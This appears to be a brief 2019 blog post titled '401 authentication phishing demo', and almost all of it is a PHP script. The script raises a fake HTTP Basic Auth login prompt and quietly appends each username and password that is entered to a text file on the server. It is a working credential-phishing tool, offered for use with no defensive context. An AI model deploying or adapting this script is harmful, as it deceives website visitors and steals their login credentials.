401认证钓鱼demo 

<?php
//@b4dboy
if(!isset($_SERVER['PHP_AUTH_USER']) && !isset($_SERVER['PHP_AUTH_PW'])) {
    Header("WWW-Authenticate: Basic realm=\"USER LOGIN\"");
    Header("HTTP/1.0 401 Unauthorized");
} else {
    @file_put_contents('./b4dboy.txt', $_SERVER['PHP_AUTH_USER'].'|'.$_SERVER['PHP_AUTH_PW']."\r\n", FILE_APPEND);
    //xxx
}

    ?>

 

posted @ 2019-09-13 19:36  M0rta1s  阅读(324)  评论(0编辑  收藏  举报